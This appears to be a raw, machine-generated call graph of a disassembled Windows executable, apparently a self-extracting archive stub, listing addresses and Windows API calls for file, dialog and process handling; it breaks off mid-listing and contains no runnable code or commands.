GdipCreateBitmapFromStream 24036->24038 24039 1fa3e6 24037->24039 24038->24039 24039->24034 24041 1eda75 _wcschr __EH_prolog 24040->24041 24042 1edaa4 GetModuleFileNameW 24041->24042 24043 1edad5 24041->24043 24044 1edabe 24042->24044 24086 1e98e0 24043->24086 24044->24043 24046 1edb31 24097 206310 24046->24097 24048 1ee261 78 API calls 24051 1edb05 24048->24051 24051->24046 24051->24048 24064 1edd4a 24051->24064 24052 1edb44 24053 206310 26 API calls 24052->24053 24061 1edb56 ___vcrt_InitializeCriticalSectionEx 24053->24061 24054 1edc85 24054->24064 24133 1e9d70 81 API calls 24054->24133 24058 1edc9f ___std_exception_copy 24059 1e9bd0 82 API calls 24058->24059 24058->24064 24062 1edcc8 ___std_exception_copy 24059->24062 24061->24054 24061->24064 24111 1e9e80 24061->24111 24127 1e9bd0 24061->24127 24132 1e9d70 81 API calls 24061->24132 24062->24064 24081 1edcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24062->24081 24134 1f1b84 MultiByteToWideChar 24062->24134 24120 1e959a 24064->24120 24065 1ee159 24069 1ee1de 24065->24069 24140 208cce 26 API calls 2 library calls 24065->24140 24067 1ee16e 24141 207625 26 API calls 2 library calls 24067->24141 24070 1ee214 24069->24070 24073 1ee261 78 API calls 24069->24073 24074 206310 26 API calls 24070->24074 24072 1ee1c6 24142 1ee27c 78 API calls 24072->24142 24073->24069 24076 1ee22d 24074->24076 24077 206310 26 API calls 24076->24077 24077->24064 24079 1f1da7 WideCharToMultiByte 24079->24081 24081->24064 24081->24065 24081->24079 24135 1ee5b1 50 API calls __vsnprintf 24081->24135 24136 206159 26 API calls 3 library calls 24081->24136 24137 208cce 26 API calls 2 library calls 24081->24137 24138 207625 26 API calls 2 library calls 24081->24138 24139 1ee27c 78 API calls 24081->24139 24084 1ee29e GetModuleHandleW FindResourceW 24085 1eda55 24084->24085 24085->23927 24088 1e98ea 24086->24088 24087 1e994b CreateFileW 24089 1e996c GetLastError 24087->24089 24092 1e99bb 24087->24092 24088->24087 24143 1ebb03 24089->24143 24091 1e998c 24091->24092 24094 1e9990 CreateFileW GetLastError 24091->24094 24093 1e99ff 24092->24093 24095 1e99e5 SetFileTime 24092->24095 24093->24051 24094->24092 24096 1e99b5 24094->24096 24095->24093 24096->24092 24098 206349 24097->24098 24099 20634d 24098->24099 24110 206375 24098->24110 24147 2091a8 20 API calls _abort 24099->24147 24101 206352 24148 209087 26 API calls __cftof 24101->24148 24102 206699 24104 1ffbbc _ValidateLocalCookies 5 API calls 24102->24104 24106 2066a6 24104->24106 24105 20635d 24107 1ffbbc _ValidateLocalCookies 5 API calls 24105->24107 24106->24052 24108 206369 24107->24108 24108->24052 24110->24102 24149 206230 5 API calls _ValidateLocalCookies 24110->24149 24112 1e9e92 24111->24112 24114 1e9ea5 24111->24114 24113 1e9eb0 24112->24113 24150 1e6d5b 77 API calls 24112->24150 24113->24061 24114->24113 24116 1e9eb8 SetFilePointer 24114->24116 24116->24113 24117 1e9ed4 GetLastError 24116->24117 24117->24113 24118 1e9ede 24117->24118 24118->24113 24151 1e6d5b 77 API calls 24118->24151 24121 1e95be 24120->24121 24122 1e95cf 24120->24122 24121->24122 24123 1e95ca 24121->24123 24124 1e95d1 24121->24124 24122->24084 24152 1e974e 24123->24152 24157 1e9620 24124->24157 24128 1e9bdc 24127->24128 24130 1e9be3 24127->24130 24128->24061 24130->24128 24131 1e9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24130->24131 24172 1e6d1a 77 API calls 24130->24172 24131->24130 24132->24061 24133->24058 24134->24081 24135->24081 24136->24081 24137->24081 24138->24081 24139->24081 24140->24067 24141->24072 24142->24069 24144 1ebb10 _wcslen 24143->24144 24145 1ebbb8 GetCurrentDirectoryW 24144->24145 24146 1ebb39 _wcslen 24144->24146 24145->24146 24146->24091 24147->24101 24148->24105 24149->24110 24150->24114 24151->24113 24153 1e9757 24152->24153 24154 1e9781 24152->24154 24153->24154 24163 1ea1e0 24153->24163 24154->24122 24158 1e964a 24157->24158 24159 1e962c 24157->24159 24160 1e9669 24158->24160 24171 1e6bd5 76 API calls 24158->24171 24159->24158 24161 1e9638 CloseHandle 24159->24161 24160->24122 24161->24158 24164 1fec50 24163->24164 24165 1ea1ed DeleteFileW 24164->24165 24166 1e977f 24165->24166 24167 1ea200 24165->24167 24166->24122 24168 1ebb03 GetCurrentDirectoryW 24167->24168 24169 1ea214 24168->24169 24169->24166 24170 1ea218 DeleteFileW 24169->24170 24170->24166 24171->24160 24172->24130 24174 1feb3d ___std_exception_copy 24173->24174 24175 1f90d6 24174->24175 24178 1feb59 24174->24178 24182 207a5e 7 API calls 2 library calls 24174->24182 24175->23701 24177 1ff5c9 24184 20238d RaiseException 24177->24184 24178->24177 24183 20238d RaiseException 24178->24183 24181 1ff5e6 24182->24174 24183->24177 24184->24181 24186 207ce1 _unexpected 24185->24186 24187 207ce8 24186->24187 24188 207cfa 24186->24188 24221 207e2f GetModuleHandleW 24187->24221 24209 20ac31 EnterCriticalSection 24188->24209 24191 207ced 24191->24188 24222 207e73 GetModuleHandleExW 24191->24222 24192 207d9f 24210 207ddf 24192->24210 24195 207d01 24195->24192 24197 207d76 24195->24197 24230 2087e0 20 API calls _abort 24195->24230 24201 207d8e 24197->24201 24206 208a91 _abort 5 API calls 24197->24206 24199 207de8 24231 212390 5 API calls _ValidateLocalCookies 24199->24231 24200 207dbc 24213 207dee 24200->24213 24202 208a91 _abort 5 API calls 24201->24202 24202->24192 24206->24201 24209->24195 24232 20ac81 LeaveCriticalSection 24210->24232 24212 207db8 24212->24199 24212->24200 24233 20b076 24213->24233 24216 207e1c 24219 207e73 _abort 8 API calls 24216->24219 24217 207dfc GetPEB 24217->24216 24218 207e0c GetCurrentProcess TerminateProcess 24217->24218 24218->24216 24220 207e24 ExitProcess 24219->24220 24221->24191 24223 207ec0 24222->24223 24224 207e9d GetProcAddress 24222->24224 24225 207ec6 FreeLibrary 24223->24225 24226 207ecf 24223->24226 24227 207eb2 24224->24227 24225->24226 24228 1ffbbc _ValidateLocalCookies 5 API calls 24226->24228 24227->24223 24229 207cf9 24228->24229 24229->24188 24230->24197 24232->24212 24234 20b09b 24233->24234 24238 20b091 24233->24238 24235 20ac98 _abort 5 API calls 24234->24235 24235->24238 24236 1ffbbc _ValidateLocalCookies 5 API calls 24237 207df8 24236->24237 24237->24216 24237->24217 24238->24236 24239 1fe5b1 24240 1fe578 24239->24240 24242 1fe85d 24240->24242 24268 1fe5bb 24242->24268 24244 1fe86d 24245 1fe8ca 24244->24245 24248 1fe8ee 24244->24248 24246 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24245->24246 24247 1fe8d5 RaiseException 24246->24247 24249 1feac3 24247->24249 24250 1fe966 LoadLibraryExA 24248->24250 24252 1fe9c7 24248->24252 24255 1fe9d9 24248->24255 24264 1fea95 24248->24264 24249->24240 24251 1fe979 GetLastError 24250->24251 24250->24252 24253 1fe98c 24251->24253 24254 1fe9a2 24251->24254 24252->24255 24257 1fe9d2 FreeLibrary 24252->24257 24253->24252 24253->24254 24258 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24254->24258 24256 1fea37 GetProcAddress 24255->24256 24255->24264 24259 1fea47 GetLastError 24256->24259 24256->24264 24257->24255 24260 1fe9ad RaiseException 24258->24260 24261 1fea5a 24259->24261 24260->24249 24263 1fe7fb DloadReleaseSectionWriteAccess 6 API calls 24261->24263 24261->24264 24265 1fea7b RaiseException 24263->24265 24277 1fe7fb 24264->24277 24266 1fe5bb ___delayLoadHelper2@8 6 API calls 24265->24266 24267 1fea92 24266->24267 24267->24264 24269 1fe5ed 24268->24269 24270 1fe5c7 24268->24270 24269->24244 24285 1fe664 24270->24285 24272 1fe5cc 24273 1fe5e8 24272->24273 24288 1fe78d 24272->24288 24293 1fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24273->24293 24276 1fe836 24276->24244 24278 1fe82f 24277->24278 24279 1fe80d 24277->24279 24278->24249 24280 1fe664 DloadReleaseSectionWriteAccess 3 API calls 24279->24280 24281 1fe812 24280->24281 24282 1fe82a 24281->24282 24283 1fe78d DloadProtectSection 3 API calls 24281->24283 24296 1fe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24282->24296 24283->24282 24294 1fe5ee GetModuleHandleW GetProcAddress GetProcAddress 24285->24294 24287 1fe669 24287->24272 24291 1fe7a2 DloadProtectSection 24288->24291 24289 1fe7a8 24289->24273 24290 1fe7dd VirtualProtect 24290->24289 24291->24289 24291->24290 24295 1fe6a3 VirtualQuery GetSystemInfo 24291->24295 24293->24276 24294->24287 24295->24290 24296->24278 25408 1fb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25446 1e6faa 111 API calls 3 library calls 25409 1feda7 48 API calls _unexpected 25382 20b49d 6 API calls _ValidateLocalCookies 25383 1fdca1 DialogBoxParamW 25447 1ff3a0 27 API calls 25425 20bee0 GetCommandLineA GetCommandLineW 24397 1fe2d7 24398 1fe1db 24397->24398 24399 1fe85d ___delayLoadHelper2@8 14 API calls 24398->24399 24399->24398 24401 1e10d5 24406 1e5abd 24401->24406 24407 1e5ac7 __EH_prolog 24406->24407 24413 1eb505 24407->24413 24409 1e5ad3 24419 1e5cac GetCurrentProcess GetProcessAffinityMask 24409->24419 24414 1eb50f __EH_prolog 24413->24414 24420 1ef1d0 82 API calls 24414->24420 24416 1eb521 24421 1eb61e 24416->24421 24420->24416 24422 1eb630 _abort 24421->24422 24425 1f10dc 24422->24425 24428 1f109e GetCurrentProcess GetProcessAffinityMask 24425->24428 24429 1eb597 24428->24429 24429->24409 25384 1ff4d3 20 API calls 24430 1fe1d1 14 API calls ___delayLoadHelper2@8 24432 2098f0 24440 20adaf 24432->24440 24436 20990c 24437 209919 24436->24437 24448 209920 11 API calls 24436->24448 24439 209904 24441 20ac98 _abort 5 API calls 24440->24441 24442 20add6 24441->24442 24443 20adee TlsAlloc 24442->24443 24444 20addf 24442->24444 24443->24444 24445 1ffbbc _ValidateLocalCookies 5 API calls 24444->24445 24446 2098fa 24445->24446 24446->24439 24447 209869 20 API calls 2 library calls 24446->24447 24447->24436 24448->24439 24449 20abf0 24451 20abfb 24449->24451 24450 20af0a 11 API calls 24450->24451 24451->24450 24452 20ac24 24451->24452 24454 20ac20 24451->24454 24455 20ac50 DeleteCriticalSection 24452->24455 24455->24454 25385 2088f0 7 API calls ___scrt_uninitialize_crt 25427 1f62ca 123 API calls __InternalCxxFrameHandler 25387 202cfb 38 API calls 4 library calls 24464 1fdec2 24465 1fdecf 24464->24465 24466 1ee617 53 API calls 24465->24466 24467 1fdedc 24466->24467 24468 1e4092 _swprintf 51 API calls 24467->24468 24469 1fdef1 SetDlgItemTextW 24468->24469 24472 1fb568 PeekMessageW 24469->24472 24473 1fb5bc 24472->24473 24474 1fb583 GetMessageW 24472->24474 24475 1fb599 IsDialogMessageW 24474->24475 24476 1fb5a8 TranslateMessage DispatchMessageW 24474->24476 24475->24473 24475->24476 24476->24473 25410 1fb5c0 100 API calls 25451 1f77c0 118 API calls 25452 1fffc0 RaiseException _com_raise_error _com_error::_com_error 25411 1e95f0 80 API calls 25412 1ffd4f 9 API calls 2 library calls 25428 1e5ef0 82 API calls 25453 20a3d0 21 API calls 2 library calls 25454 212bd0 VariantClear 25415 1ef1e8 FreeLibrary 24511 1feae7 24512 1feaf1 24511->24512 24513 1fe85d ___delayLoadHelper2@8 14 API calls 24512->24513 24514 1feafe 24513->24514 25389 1ff4e7 29 API calls _abort 25430 200ada 51 API calls 2 library calls 24516 1fb7e0 24517 1fb7ea __EH_prolog 24516->24517 24684 1e1316 24517->24684 24520 1fbf0f 24749 1fd69e 24520->24749 24521 1fb82a 24523 1fb89b 24521->24523 24524 1fb838 24521->24524 24597 1fb841 24521->24597 24526 1fb92e GetDlgItemTextW 24523->24526 24531 1fb8b1 24523->24531 24527 1fb83c 24524->24527 24528 1fb878 24524->24528 24526->24528 24534 1fb96b 24526->24534 24538 1ee617 53 API calls 24527->24538 24527->24597 24535 1fb95f KiUserCallbackDispatcher 24528->24535 24528->24597 24529 1fbf2a SendMessageW 24530 1fbf38 24529->24530 24532 1fbf52 GetDlgItem SendMessageW 24530->24532 24533 1fbf41 SendDlgItemMessageW 24530->24533 24537 1ee617 53 API calls 24531->24537 24767 1fa64d GetCurrentDirectoryW 24532->24767 24533->24532 24536 1fb980 GetDlgItem 24534->24536 24682 1fb974 24534->24682 24535->24597 24540 1fb9b7 SetFocus 24536->24540 24541 1fb994 SendMessageW SendMessageW 24536->24541 24542 1fb8ce SetDlgItemTextW 24537->24542 24543 1fb85b 24538->24543 24545 1fb9c7 24540->24545 24562 1fb9e0 24540->24562 24541->24540 24546 1fb8d9 24542->24546 24789 1e124f SHGetMalloc 24543->24789 24544 1fbf82 GetDlgItem 24548 1fbf9f 24544->24548 24549 1fbfa5 SetWindowTextW 24544->24549 24551 1ee617 53 API calls 24545->24551 24555 1fb8e6 GetMessageW 24546->24555 24546->24597 24548->24549 24768 1fabab GetClassNameW 24549->24768 24556 1fb9d1 24551->24556 24552 1fb862 24563 1fc1fc SetDlgItemTextW 24552->24563 24552->24597 24553 1fbe55 24557 1ee617 53 API calls 24553->24557 24560 1fb8fd IsDialogMessageW 24555->24560 24555->24597 24790 1fd4d4 24556->24790 24558 1fbe65 SetDlgItemTextW 24557->24558 24564 1fbe79 24558->24564 24560->24546 24566 1fb90c TranslateMessage DispatchMessageW 24560->24566 24567 1ee617 53 API calls 24562->24567 24563->24597 24569 1ee617 53 API calls 24564->24569 24566->24546 24568 1fba17 24567->24568 24571 1e4092 _swprintf 51 API calls 24568->24571 24605 1fbe9c _wcslen 24569->24605 24570 1fbff0 24574 1fc020 24570->24574 24577 1ee617 53 API calls 24570->24577 24576 1fba29 24571->24576 24572 1fc73f 97 API calls 24572->24570 24573 1fb9d9 24694 1ea0b1 24573->24694 24579 1fc0d8 24574->24579 24580 1fc73f 97 API calls 24574->24580 24581 1fd4d4 16 API calls 24576->24581 24583 1fc003 SetDlgItemTextW 24577->24583 24582 1fc18b 24579->24582 24614 1fc169 24579->24614 24633 1ee617 53 API calls 24579->24633 24586 1fc03b 24580->24586 24581->24573 24587 1fc19d 24582->24587 24588 1fc194 EnableWindow 24582->24588 24589 1ee617 53 API calls 24583->24589 24584 1fba73 24700 1fac04 SetCurrentDirectoryW 24584->24700 24585 1fba68 GetLastError 24585->24584 24598 1fc04d 24586->24598 24618 1fc072 24586->24618 24593 1fc1ba 24587->24593 24808 1e12d3 GetDlgItem EnableWindow 24587->24808 24588->24587 24594 1fc017 SetDlgItemTextW 24589->24594 24591 1fba87 24595 1fba9e 24591->24595 24596 1fba90 GetLastError 24591->24596 24592 1ee617 53 API calls 24592->24597 24601 1fc1e1 24593->24601 24609 1fc1d9 SendMessageW 24593->24609 24594->24574 24607 1fbb20 24595->24607 24610 1fbaae GetTickCount 24595->24610 24656 1fbb11 24595->24656 24596->24595 24806 1f9ed5 32 API calls 24598->24806 24599 1fc0cb 24602 1fc73f 97 API calls 24599->24602 24601->24597 24611 1ee617 53 API calls 24601->24611 24602->24579 24604 1fc1b0 24809 1e12d3 GetDlgItem EnableWindow 24604->24809 24612 1ee617 53 API calls 24605->24612 24634 1fbeed 24605->24634 24606 1fbd56 24709 1e12f1 GetDlgItem ShowWindow 24606->24709 24613 1fbcfb 24607->24613 24615 1fbb39 GetModuleFileNameW 24607->24615 24616 1fbcf1 24607->24616 24609->24601 24620 1e4092 _swprintf 51 API calls 24610->24620 24611->24552 24621 1fbed0 24612->24621 24624 1ee617 53 API calls 24613->24624 24807 1f9ed5 32 API calls 24614->24807 24800 1ef28c 82 API calls 24615->24800 24616->24528 24616->24613 24617 1fc066 24617->24618 24618->24599 24631 1fc73f 97 API calls 24618->24631 24626 1fbac7 24620->24626 24627 1e4092 _swprintf 51 API calls 24621->24627 24630 1fbd05 24624->24630 24625 1fbd66 24710 1e12f1 GetDlgItem ShowWindow 24625->24710 24701 1e966e 24626->24701 24627->24634 24628 1fc188 24628->24582 24629 1fbb5f 24635 1e4092 _swprintf 51 API calls 24629->24635 24636 1e4092 _swprintf 51 API calls 24630->24636 24637 1fc0a0 24631->24637 24633->24579 24634->24592 24639 1fbb81 CreateFileMappingW 24635->24639 24640 1fbd23 24636->24640 24637->24599 24641 1fc0a9 DialogBoxParamW 24637->24641 24638 1fbd70 24642 1ee617 53 API calls 24638->24642 24644 1fbbe3 GetCommandLineW 24639->24644 24678 1fbc60 __InternalCxxFrameHandler 24639->24678 24653 1ee617 53 API calls 24640->24653 24641->24528 24641->24599 24645 1fbd7a SetDlgItemTextW 24642->24645 24647 1fbbf4 24644->24647 24711 1e12f1 GetDlgItem ShowWindow 24645->24711 24646 1fbaed 24650 1fbaf4 GetLastError 24646->24650 24651 1fbaff 24646->24651 24801 1fb425 SHGetMalloc 24647->24801 24648 1fbc6b ShellExecuteExW 24673 1fbc88 24648->24673 24650->24651 24655 1e959a 80 API calls 24651->24655 24658 1fbd3d 24653->24658 24654 1fbd8c SetDlgItemTextW GetDlgItem 24659 1fbda9 GetWindowLongW SetWindowLongW 24654->24659 24660 1fbdc1 24654->24660 24655->24656 24656->24606 24656->24607 24657 1fbc10 24802 1fb425 SHGetMalloc 24657->24802 24659->24660 24712 1fc73f 24660->24712 24663 1fbc1c 24803 1fb425 SHGetMalloc 24663->24803 24666 1fbccb 24666->24616 24671 1fbce1 UnmapViewOfFile CloseHandle 24666->24671 24667 1fc73f 97 API calls 24668 1fbddd 24667->24668 24737 1fda52 24668->24737 24669 1fbc28 24804 1ef3fa 82 API calls 2 library calls 24669->24804 24671->24616 24673->24666 24676 1fbcb7 Sleep 24673->24676 24675 1fbc3f MapViewOfFile 24675->24678 24676->24666 24676->24673 24677 1fc73f 97 API calls 24681 1fbe03 24677->24681 24678->24648 24679 1fbe2c 24805 1e12d3 GetDlgItem EnableWindow 24679->24805 24681->24679 24683 1fc73f 97 API calls 24681->24683 24682->24528 24682->24553 24683->24679 24685 1e131f 24684->24685 24686 1e1378 24684->24686 24688 1e1385 24685->24688 24810 1ee2e8 62 API calls 2 library calls 24685->24810 24811 1ee2c1 GetWindowLongW SetWindowLongW 24686->24811 24688->24520 24688->24521 24688->24597 24690 1e1341 24690->24688 24691 1e1354 GetDlgItem 24690->24691 24691->24688 24692 1e1364 24691->24692 24692->24688 24693 1e136a SetWindowTextW 24692->24693 24693->24688 24696 1ea0bb 24694->24696 24695 1ea175 24695->24584 24695->24585 24696->24695 24697 1ea14c 24696->24697 24812 1ea2b2 24696->24812 24697->24695 24698 1ea2b2 8 API calls 24697->24698 24698->24695 24700->24591 24702 1e9678 24701->24702 24703 1e96d5 CreateFileW 24702->24703 24704 1e96c9 24702->24704 24703->24704 24705 1e971f 24704->24705 24706 1ebb03 GetCurrentDirectoryW 24704->24706 24705->24646 24707 1e9704 24706->24707 24707->24705 24708 1e9708 CreateFileW 24707->24708 24708->24705 24709->24625 24710->24638 24711->24654 24713 1fc749 __EH_prolog 24712->24713 24714 1fbdcf 24713->24714 24715 1fb314 ExpandEnvironmentStringsW 24713->24715 24714->24667 24726 1fc780 _wcslen _wcsrchr 24715->24726 24717 1fb314 ExpandEnvironmentStringsW 24717->24726 24718 1fca67 SetWindowTextW 24718->24726 24721 203e3e 22 API calls 24721->24726 24723 1fc855 SetFileAttributesW 24725 1fc90f GetFileAttributesW 24723->24725 24736 1fc86f _abort _wcslen 24723->24736 24725->24726 24728 1fc921 DeleteFileW 24725->24728 24726->24714 24726->24717 24726->24718 24726->24721 24726->24723 24729 1fcc31 GetDlgItem SetWindowTextW SendMessageW 24726->24729 24732 1fcc71 SendMessageW 24726->24732 24833 1f1fbb CompareStringW 24726->24833 24834 1fa64d GetCurrentDirectoryW 24726->24834 24836 1ea5d1 6 API calls 24726->24836 24837 1ea55a FindClose 24726->24837 24838 1fb48e 76 API calls 2 library calls 24726->24838 24728->24726 24730 1fc932 24728->24730 24729->24726 24731 1e4092 _swprintf 51 API calls 24730->24731 24733 1fc952 GetFileAttributesW 24731->24733 24732->24726 24733->24730 24734 1fc967 MoveFileW 24733->24734 24734->24726 24735 1fc97f MoveFileExW 24734->24735 24735->24726 24736->24725 24736->24726 24835 1eb991 51 API calls 3 library calls 24736->24835 24738 1fda5c __EH_prolog 24737->24738 24839 1f0659 24738->24839 24740 1fda8d 24843 1e5b3d 24740->24843 24742 1fdaab 24847 1e7b0d 24742->24847 24746 1fdafe 24863 1e7b9e 24746->24863 24748 1fbdee 24748->24677 24750 1fd6a8 24749->24750 24751 1fa5c6 4 API calls 24750->24751 24752 1fd6ad 24751->24752 24753 1fd6b5 GetWindow 24752->24753 24754 1fbf15 24752->24754 24753->24754 24757 1fd6d5 24753->24757 24754->24529 24754->24530 24755 1fd6e2 GetClassNameW 25341 1f1fbb CompareStringW 24755->25341 24757->24754 24757->24755 24758 1fd76a GetWindow 24757->24758 24759 1fd706 GetWindowLongW 24757->24759 24758->24754 24758->24757 24759->24758 24760 1fd716 SendMessageW 24759->24760 24760->24758 24761 1fd72c GetObjectW 24760->24761 25342 1fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24761->25342 24763 1fd743 25343 1fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24763->25343 25344 1fa80c 8 API calls 24763->25344 24766 1fd754 SendMessageW DeleteObject 24766->24758 24767->24544 24769 1fabcc 24768->24769 24770 1fabf1 24768->24770 25345 1f1fbb CompareStringW 24769->25345 24772 1fabff 24770->24772 24773 1fabf6 SHAutoComplete 24770->24773 24776 1fb093 24772->24776 24773->24772 24774 1fabdf 24774->24770 24775 1fabe3 FindWindowExW 24774->24775 24775->24770 24777 1fb09d __EH_prolog 24776->24777 24778 1e13dc 84 API calls 24777->24778 24779 1fb0bf 24778->24779 25346 1e1fdc 24779->25346 24782 1fb0eb 24785 1e19af 128 API calls 24782->24785 24783 1fb0d9 24784 1e1692 86 API calls 24783->24784 24786 1fb0e4 24784->24786 24788 1fb10d __InternalCxxFrameHandler ___std_exception_copy 24785->24788 24786->24570 24786->24572 24787 1e1692 86 API calls 24787->24786 24788->24787 24789->24552 24791 1fb568 5 API calls 24790->24791 24792 1fd4e0 GetDlgItem 24791->24792 24793 1fd536 SendMessageW SendMessageW 24792->24793 24796 1fd502 24792->24796 24794 1fd572 24793->24794 24795 1fd591 SendMessageW SendMessageW SendMessageW 24793->24795 24794->24795 24797 1fd5e7 SendMessageW 24795->24797 24798 1fd5c4 SendMessageW 24795->24798 24799 1fd50d ShowWindow SendMessageW SendMessageW 24796->24799 24797->24573 24798->24797 24799->24793 24800->24629 24801->24657 24802->24663 24803->24669 24804->24675 24805->24682 24806->24617 24807->24628 24808->24604 24809->24593 24810->24690 24811->24688 24813 1ea2bf 24812->24813 24814 1ea2e3 24813->24814 24815 1ea2d6 CreateDirectoryW 24813->24815 24816 1ea231 3 API calls 24814->24816 24815->24814 24817 1ea316 24815->24817 24818 1ea2e9 24816->24818 24820 1ea325 24817->24820 24825 1ea4ed 24817->24825 24819 1ea329 GetLastError 24818->24819 24821 1ebb03 GetCurrentDirectoryW 24818->24821 24819->24820 24820->24696 24823 1ea2ff 24821->24823 24823->24819 24824 1ea303 CreateDirectoryW 24823->24824 24824->24817 24824->24819 24826 1fec50 24825->24826 24827 1ea4fa SetFileAttributesW 24826->24827 24828 1ea53d 24827->24828 24829 1ea510 24827->24829 24828->24820 24830 1ebb03 GetCurrentDirectoryW 24829->24830 24831 1ea524 24830->24831 24831->24828 24832 1ea528 SetFileAttributesW 24831->24832 24832->24828 24833->24726 24834->24726 24835->24736 24836->24726 24837->24726 24838->24726 24840 1f0666 _wcslen 24839->24840 24867 1e17e9 24840->24867 24842 1f067e 24842->24740 24844 1f0659 _wcslen 24843->24844 24845 1e17e9 78 API calls 24844->24845 24846 1f067e 24845->24846 24846->24742 24848 1e7b17 __EH_prolog 24847->24848 24884 1ece40 24848->24884 24850 1e7b32 24851 1feb38 8 API calls 24850->24851 24852 1e7b5c 24851->24852 24890 1f4a76 24852->24890 24855 1e7c7d 24856 1e7c87 24855->24856 24858 1e7cf1 24856->24858 24919 1ea56d 24856->24919 24859 1e7d50 24858->24859 24897 1e8284 24858->24897 24861 1e7d92 24859->24861 24925 1e138b 74 API calls 24859->24925 24861->24746 24864 1e7bac 24863->24864 24866 1e7bb3 24863->24866 24865 1f2297 86 API calls 24864->24865 24865->24866 24868 1e17ff 24867->24868 24879 1e185a __InternalCxxFrameHandler 24867->24879 24869 1e1828 24868->24869 24880 1e6c36 76 API calls __vswprintf_c_l 24868->24880 24871 1e1887 24869->24871 24876 1e1847 ___std_exception_copy 24869->24876 24873 203e3e 22 API calls 24871->24873 24872 1e181e 24881 1e6ca7 75 API calls 24872->24881 24875 1e188e 24873->24875 24875->24879 24883 1e6ca7 75 API calls 24875->24883 24876->24879 24882 1e6ca7 75 API calls 24876->24882 24879->24842 24880->24872 24881->24869 24882->24879 24883->24879 24885 1ece4a __EH_prolog 24884->24885 24886 1feb38 8 API calls 24885->24886 24887 1ece8d 24886->24887 24888 1feb38 8 API calls 24887->24888 24889 1eceb1 24888->24889 24889->24850 24891 1f4a80 __EH_prolog 24890->24891 24892 1feb38 8 API calls 24891->24892 24893 1f4a9c 24892->24893 24894 1e7b8b 24893->24894 24896 1f0e46 80 API calls 24893->24896 24894->24855 24896->24894 24898 1e828e __EH_prolog 24897->24898 24926 1e13dc 24898->24926 24900 1e82aa 24901 1e82bb 24900->24901 25069 1e9f42 24900->25069 24904 1e82f2 24901->24904 24934 1e1a04 24901->24934 25065 1e1692 24904->25065 24907 1e82ee 24907->24904 24915 1ea56d 7 API calls 24907->24915 24918 1e8389 24907->24918 25073 1ec0c5 CompareStringW _wcslen 24907->25073 24911 1e83e8 24961 1e1f6d 24911->24961 24915->24907 24916 1e83f3 24916->24904 24965 1e3b2d 24916->24965 24977 1e848e 24916->24977 24953 1e8430 24918->24953 24920 1ea582 24919->24920 24921 1ea5b0 24920->24921 25330 1ea69b 24920->25330 24921->24856 24923 1ea592 24923->24921 24924 1ea597 FindClose 24923->24924 24924->24921 24925->24861 24927 1e13e1 __EH_prolog 24926->24927 24928 1ece40 8 API calls 24927->24928 24929 1e1419 24928->24929 24930 1feb38 8 API calls 24929->24930 24933 1e1474 _abort 24929->24933 24931 1e1461 24930->24931 24932 1eb505 84 API calls 24931->24932 24931->24933 24932->24933 24933->24900 24935 1e1a0e __EH_prolog 24934->24935 24947 1e1a61 24935->24947 24950 1e1b9b 24935->24950 25074 1e13ba 24935->25074 24937 1e1bc7 25077 1e138b 74 API calls 24937->25077 24940 1e3b2d 101 API calls 24944 1e1c12 24940->24944 24941 1e1bd4 24941->24940 24941->24950 24942 1e1c5a 24946 1e1c8d 24942->24946 24942->24950 25078 1e138b 74 API calls 24942->25078 24944->24942 24945 1e3b2d 101 API calls 24944->24945 24945->24944 24946->24950 24951 1e9e80 79 API calls 24946->24951 24947->24937 24947->24941 24947->24950 24948 1e3b2d 101 API calls 24949 1e1cde 24948->24949 24949->24948 24949->24950 24950->24907 24951->24949 24952 1e9e80 79 API calls 24952->24947 25096 1ecf3d 24953->25096 24955 1e8440 25100 1f13d2 GetSystemTime SystemTimeToFileTime 24955->25100 24957 1e83a3 24957->24911 24958 1f1b66 24957->24958 25101 1fde6b 24958->25101 24962 1e1f72 __EH_prolog 24961->24962 24964 1e1fa6 24962->24964 25109 1e19af 24962->25109 24964->24916 24966 1e3b3d 24965->24966 24967 1e3b39 24965->24967 24976 1e9e80 79 API calls 24966->24976 24967->24916 24968 1e3b4f 24969 1e3b6a 24968->24969 24970 1e3b78 24968->24970 24975 1e3baa 24969->24975 25264 1e32f7 89 API calls 2 library calls 24969->25264 25265 1e286b 101 API calls 3 library calls 24970->25265 24973 1e3b76 24973->24975 25266 1e20d7 74 API calls 24973->25266 24975->24916 24976->24968 24978 1e8498 __EH_prolog 24977->24978 24981 1e84d5 24978->24981 24988 1e8513 24978->24988 25291 1f8c8d 103 API calls 24978->25291 24980 1e84f5 24982 1e851c 24980->24982 24983 1e84fa 24980->24983 24981->24980 24986 1e857a 24981->24986 24981->24988 24982->24988 25293 1f8c8d 103 API calls 24982->25293 24983->24988 25292 1e7a0d 152 API calls 24983->25292 24986->24988 25267 1e5d1a 24986->25267 24988->24916 24989 1e8605 24989->24988 25273 1e8167 24989->25273 24992 1e8797 24993 1ea56d 7 API calls 24992->24993 24996 1e8802 24992->24996 24993->24996 24995 1ed051 82 API calls 24997 1e885d 24995->24997 25279 1e7c0d 24996->25279 24997->24988 24997->24995 24998 1e898b 24997->24998 25000 1e8992 24997->25000 25294 1e8117 84 API calls 24997->25294 25295 1e2021 74 API calls 24997->25295 25296 1e2021 74 API calls 24998->25296 24999 1e8a5f 25004 1e8ab6 24999->25004 25015 1e8a6a 24999->25015 25000->24999 25005 1e89e1 25000->25005 25003 1e8b14 25024 1e8b82 25003->25024 25053 1e9105 25003->25053 25300 1e98bc 25003->25300 25012 1e8a4c 25004->25012 25299 1e7fc0 97 API calls 25004->25299 25005->25003 25008 1ea231 3 API calls 25005->25008 25005->25012 25006 1e8ab4 25007 1e959a 80 API calls 25006->25007 25007->24988 25011 1e8a19 25008->25011 25010 1e959a 80 API calls 25010->24988 25011->25012 25297 1e92a3 97 API calls 25011->25297 25012->25003 25012->25006 25013 1eab1a 8 API calls 25016 1e8bd1 25013->25016 25015->25006 25298 1e7db2 101 API calls 25015->25298 25019 1eab1a 8 API calls 25016->25019 25033 1e8be7 25019->25033 25022 1e8b70 25304 1e6e98 77 API calls 25022->25304 25024->25013 25025 1e8cbc 25026 